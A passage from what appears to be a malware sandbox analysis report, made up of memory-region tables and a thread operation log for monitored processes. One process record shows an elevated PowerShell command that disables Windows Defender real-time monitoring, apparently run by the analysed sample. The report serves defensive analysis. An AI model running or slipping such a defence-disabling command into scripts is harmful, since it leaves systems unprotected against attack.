| tschannel.dll | 0x7fef8120000 | 0x7fef8128fff | Memory Mapped File | rwx |
|
|
|
- |
| ktmw32.dll | 0x7fef9440000 | 0x7fef9449fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7fefc040000 | 0x7fefc074fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| wevtapi.dll | 0x7fefd6b0000 | 0x7fefd71cfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefda50000 | 0x7fefda74fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x7fefdb70000 | 0x7fefdb83fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Process #25: powershell.exe
795
0
| Information | Value |
|---|---|
| ID | #25 |
| File Name | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:21, Reason: Child Process |
| Unmonitor | End Time: 00:02:42, Reason: Self Terminated |
| Monitor Duration | 00:00:21 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9c4 |
| Parent PID | 0x558 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9B0
0x
9CC
0x
9A8
0x
998
0x
9A4
0x
A94
0x
7E4
0x
BB0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x00080000 | 0x00082fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0023ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00241fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00250fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00261fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x002affff | Private Memory | rwx |
|
|
|
- |
| cversions.2.db | 0x002b0000 | 0x002b3fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x002c0000 | 0x002dffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x00567fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x00570fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00580000 | 0x00583fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x00720fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x01b2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x01b30000 | 0x01b5ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001b60000 | 0x01b60000 | 0x01b9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001ba0000 | 0x01ba0000 | 0x01c7efff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c80000 | 0x01c80000 | 0x01c80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c90000 | 0x01c90000 | 0x01c9ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01ca0000 | 0x01f6efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001f70000 | 0x01f70000 | 0x01faffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01fb0000 | 0x02015fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002020000 | 0x02020000 | 0x02020fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002030000 | 0x02030000 | 0x0206ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002070000 | 0x02070000 | 0x020affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000020b0000 | 0x020b0000 | 0x024a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000024b0000 | 0x024b0000 | 0x025affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000025b0000 | 0x025b0000 | 0x025b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000025c0000 | 0x025c0000 | 0x025cffff | Private Memory | - |
|
|
|
- |
| private_0x00000000025d0000 | 0x025d0000 | 0x025dffff | Private Memory | - |
|
|
|
- |
| private_0x00000000025e0000 | 0x025e0000 | 0x025effff | Private Memory | - |
|
|
|
- |
| private_0x00000000025f0000 | 0x025f0000 | 0x025fffff | Private Memory | - |
|
|
|
- |
| private_0x0000000002600000 | 0x02600000 | 0x0260ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000002610000 | 0x02610000 | 0x0261ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000002620000 | 0x02620000 | 0x0262ffff | Private Memory | rw |
|
|
|
- |
| l_intl.nls | 0x02630000 | 0x02632fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002640000 | 0x02640000 | 0x0267ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002680000 | 0x02680000 | 0x026bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026c0000 | 0x026c0000 | 0x026c0fff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x026d0000 | 0x026d4fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000026e0000 | 0x026e0000 | 0x0271ffff | Private Memory | rw |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x02720000 | 0x02727fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000002730000 | 0x02730000 | 0x02730fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002760000 | 0x02760000 | 0x0279ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027b0000 | 0x027b0000 | 0x027effff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x027f0000 | 0x02830fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002860000 | 0x02860000 | 0x0286ffff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x02870000 | 0x028b2fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000028d0000 | 0x028d0000 | 0x0290ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002910000 | 0x02910000 | 0x0490ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004910000 | 0x04910000 | 0x049affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049b0000 | 0x049b0000 | 0x049effff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x049f0000 | 0x04aaffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000004ad0000 | 0x04ad0000 | 0x04b0ffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x04b10000 | 0x04df1fff | Memory Mapped File | rwx |
|
|
|
- |
| powershell.exe | 0x21fb0000 | 0x22021fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.dll | 0x67aa0000 | 0x67ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x71c70000 | 0x71d0bfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x71d10000 | 0x71d94fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x71da0000 | 0x71fd4fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x71fe0000 | 0x72859fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.dll | 0x72860000 | 0x72b41fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x72b50000 | 0x732ebfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x732f0000 | 0x73de7fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x74670000 | 0x7470afff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x74710000 | 0x74cbafff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x74cc0000 | 0x74d37fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x74d40000 | 0x74d49fff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x74d50000 | 0x74d5afff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x74d60000 | 0x74dcffff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74dd0000 | 0x74ec4fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74ed0000 | 0x7506dfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x75090000 | 0x750bdfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x750d0000 | 0x7511afff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x75120000 | 0x751a0fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x75350000 | 0x75368fff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x75370000 | 0x75378fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x75380000 | 0x753a4fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x753b0000 | 0x753b8fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x753c0000 | 0x7540bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x75410000 | 0x75430fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x75440000 | 0x75489fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x75490000 | 0x754a3fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x754c0000 | 0x754d6fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x754e0000 | 0x7551afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75520000 | 0x75535fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75f20000 | 0x75f31fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75f90000 | 0x75f94fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76530000 | 0x76574fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76580000 | 0x7671cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77750000 | 0x77776fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 46 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Threads
Thread 0x9b0
572
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
12 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096 |
|
41 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
